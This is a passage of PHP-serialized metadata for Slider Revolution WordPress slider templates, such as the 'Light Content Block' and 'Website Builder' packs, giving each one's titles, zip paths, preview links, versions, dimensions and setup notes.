help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:13:\"Fullsite Dark\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"2\";s:9:\"installed\";b:0;}i:75;a:25:{s:2:\"id\";s:2:\"77\";s:5:\"title\";s:26:\"Light Content Block - Menu\";s:5:\"alias\";s:19:\"fullsite-block-menu\";s:3:\"zip\";s:29:\"packs/fullsite-block-menu.zip\";s:3:\"uid\";s:32:\"8010971f34387d5f94a1f4e577ef382a\";s:3:\"img\";s:30:\"fullsite-block-menu/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:76;a:25:{s:2:\"id\";s:2:\"78\";s:5:\"title\";s:26:\"Light Content Block - Hero\";s:5:\"alias\";s:15:\"fullsite-block1\";s:3:\"zip\";s:25:\"packs/fullsite-block1.zip\";s:3:\"uid\";s:32:\"45bf7179843e01ce112e8ec754b0455c\";s:3:\"img\";s:26:\"fullsite-block1/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:77;a:25:{s:2:\"id\";s:2:\"79\";s:5:\"title\";s:27:\"Light Content Block - About\";s:5:\"alias\";s:22:\"fullsite-block-2-about\";s:3:\"zip\";s:32:\"packs/fullsite-block-2-about.zip\";s:3:\"uid\";s:32:\"8402b460638a746d36433cb161440b7d\";s:3:\"img\";s:33:\"fullsite-block-2-about/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:78;a:25:{s:2:\"id\";s:2:\"80\";s:5:\"title\";s:30:\"Light Content Block - Services\";s:5:\"alias\";s:25:\"fullsite-block-3-services\";s:3:\"zip\";s:35:\"packs/fullsite-block-3-services.zip\";s:3:\"uid\";s:32:\"7b8cea27f4d6ae17c5e1eae12457bd06\";s:3:\"img\";s:36:\"fullsite-block-3-services/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:79;a:25:{s:2:\"id\";s:2:\"81\";s:5:\"title\";s:30:\"Light Content Block - Products\";s:5:\"alias\";s:25:\"fullsite-block-4-products\";s:3:\"zip\";s:35:\"packs/fullsite-block-4-products.zip\";s:3:\"uid\";s:32:\"d148935362d7122636cda0635eae4be7\";s:3:\"img\";s:36:\"fullsite-block-4-products/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:80;a:25:{s:2:\"id\";s:2:\"82\";s:5:\"title\";s:34:\"Light Content Block - Testimonials\";s:5:\"alias\";s:29:\"fullsite-block-5-testimonials\";s:3:\"zip\";s:39:\"packs/fullsite-block-5-testimonials.zip\";s:3:\"uid\";s:32:\"06255bfd421e40f71fa8197b839dbf03\";s:3:\"img\";s:40:\"fullsite-block-5-testimonials/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:81;a:25:{s:2:\"id\";s:2:\"83\";s:5:\"title\";s:29:\"Light Content Block - Callout\";s:5:\"alias\";s:24:\"fullsite-block-6-callout\";s:3:\"zip\";s:34:\"packs/fullsite-block-6-callout.zip\";s:3:\"uid\";s:32:\"8a88c3447676b613ec5db2fe5d63315c\";s:3:\"img\";s:35:\"fullsite-block-6-callout/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:82;a:25:{s:2:\"id\";s:2:\"84\";s:5:\"title\";s:28:\"Light Content Block - Footer\";s:5:\"alias\";s:23:\"fullsite-block-7-footer\";s:3:\"zip\";s:33:\"packs/fullsite-block-7-footer.zip\";s:3:\"uid\";s:32:\"34300b4407a2093eb2e1e08868fa8319\";s:3:\"img\";s:34:\"fullsite-block-7-footer/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"5.2.5\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:8:\"Fullsite\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"1\";s:9:\"installed\";b:0;}i:83;a:22:{s:2:\"id\";s:2:\"85\";s:5:\"title\";s:12:\"Tech Journal\";s:5:\"alias\";s:11:\"techjournal\";s:3:\"zip\";s:15:\"techjournal.zip\";s:3:\"uid\";s:32:\"7f92d70d1c108378f915b18c2ceb71d6\";s:3:\"img\";s:22:\"techjournal/slide1.jpg\";s:7:\"preview\";s:59:\"https://revolution.themepunch.com/wordpress-parallax-theme/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.1\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:130:\"<span class=\"ttm_content\">A full-width slider with navigation direction-based transitions.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:84;a:22:{s:2:\"id\";s:2:\"86\";s:5:\"title\";s:14:\"Car Dealership\";s:5:\"alias\";s:13:\"cardealership\";s:3:\"zip\";s:17:\"cardealership.zip\";s:3:\"uid\";s:32:\"bb010838855a8ae4d1dd68e139bf169e\";s:3:\"img\";s:24:\"cardealership/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/car-dealership-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.1\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"650\";s:11:\"description\";s:130:\"<span class=\"ttm_content\">A full-width slider with navigation direction-based transitions.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:277:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:85;a:22:{s:2:\"id\";s:2:\"87\";s:5:\"title\";s:22:\"FullScreen Menu Slider\";s:5:\"alias\";s:14:\"fullscreenmenu\";s:3:\"zip\";s:18:\"fullscreenmenu.zip\";s:3:\"uid\";s:32:\"6de81d74c4bf193e2e274d43038adc85\";s:3:\"img\";s:25:\"fullscreenmenu/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-fullscreen-menu/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:131:\"<span class=\"ttm_content\">A full-screen slider that contains a menu with slide blur effect.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:86;a:22:{s:2:\"id\";s:2:\"88\";s:5:\"title\";s:18:\"Creative Frontpage\";s:5:\"alias\";s:17:\"creativefrontpage\";s:3:\"zip\";s:21:\"creativefrontpage.zip\";s:3:\"uid\";s:32:\"0636cb368af3bcaa2f68eb0ebefe6439\";s:3:\"img\";s:28:\"creativefrontpage/slide1.jpg\";s:7:\"preview\";s:56:\"https://revolution.themepunch.com/best-wordpress-slider/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:246:\"<span class=\"ttm_content\">A full-screen slider with hidden slides that are triggered via  <a href=\"https://www.themepunch.com/revslider-doc/layer-settings/#layeractions\" target=\"_blank\">\"Layer Actions\"</a>.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:415:\"<span class=\"ttm_content\">This is a \"Default\" content slider. Edit the slides to change images and texts.<br/>Some content is in <a href=\"https://www.themepunch.com/slider-revolution/global-layers/\" target=\"_blank\">\"Static / Global Layers\"</a><br/><br/></span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:87;a:25:{s:2:\"id\";s:2:\"89\";s:5:\"title\";s:20:\"Website Builder Menu\";s:5:\"alias\";s:19:\"websitebuilder-menu\";s:3:\"zip\";s:29:\"packs/websitebuilder-menu.zip\";s:3:\"uid\";s:32:\"d9e6d9c961f123a3a4847b51fc3ba3a2\";s:3:\"img\";s:30:\"websitebuilder-menu/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:2:\"60\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:88;a:25:{s:2:\"id\";s:2:\"90\";s:5:\"title\";s:20:\"Website Builder Hero\";s:5:\"alias\";s:19:\"websitebuilder-hero\";s:3:\"zip\";s:29:\"packs/websitebuilder-hero.zip\";s:3:\"uid\";s:32:\"6cb2df9a41ad2e7865bb9bbea7e39cb5\";s:3:\"img\";s:30:\"websitebuilder-hero/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1230\";s:6:\"height\";s:3:\"700\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:89;a:25:{s:2:\"id\";s:2:\"91\";s:5:\"title\";s:23:\"Website Builder Clients\";s:5:\"alias\";s:22:\"websitebuilder-clients\";s:3:\"zip\";s:32:\"packs/websitebuilder-clients.zip\";s:3:\"uid\";s:32:\"050e59c43c9a693510d01f29532088cf\";s:3:\"img\";s:33:\"websitebuilder-clients/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"120\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:90;a:25:{s:2:\"id\";s:2:\"92\";s:5:\"title\";s:24:\"Website Builder Services\";s:5:\"alias\";s:23:\"websitebuilder-services\";s:3:\"zip\";s:33:\"packs/websitebuilder-services.zip\";s:3:\"uid\";s:32:\"48d56d67615efce619ae973ab4358c07\";s:3:\"img\";s:34:\"websitebuilder-services/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"558\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:91;a:25:{s:2:\"id\";s:2:\"93\";s:5:\"title\";s:24:\"Website Builder Discover\";s:5:\"alias\";s:23:\"websitebuilder-discover\";s:3:\"zip\";s:33:\"packs/websitebuilder-discover.zip\";s:3:\"uid\";s:32:\"425a08a7be338daea3df02a07ff5c316\";s:3:\"img\";s:34:\"websitebuilder-discover/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"955\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:92;a:25:{s:2:\"id\";s:2:\"94\";s:5:\"title\";s:22:\"Website Builder Slider\";s:5:\"alias\";s:21:\"websitebuilder-slider\";s:3:\"zip\";s:31:\"packs/websitebuilder-slider.zip\";s:3:\"uid\";s:32:\"9d670b7335016accb590dc8d52bfb6f0\";s:3:\"img\";s:32:\"websitebuilder-slider/slide1.jpg\";s:7:\"preview\";s:60:\"https://revolution.themepunch.com/wordpress-website-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:7:\"5.2.5.3\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"500\";s:11:\"description\";s:157:\"<span class=\"ttm_content\">You can use this slider as a module on your website or install it as part of a slider pack.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:15:\"Website Builder\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:1:\"3\";s:9:\"installed\";b:0;}i:93;a:25:{s:2:\"id\";s:2:\"95\";s:5:\"title\";s:28:\"Website Builder 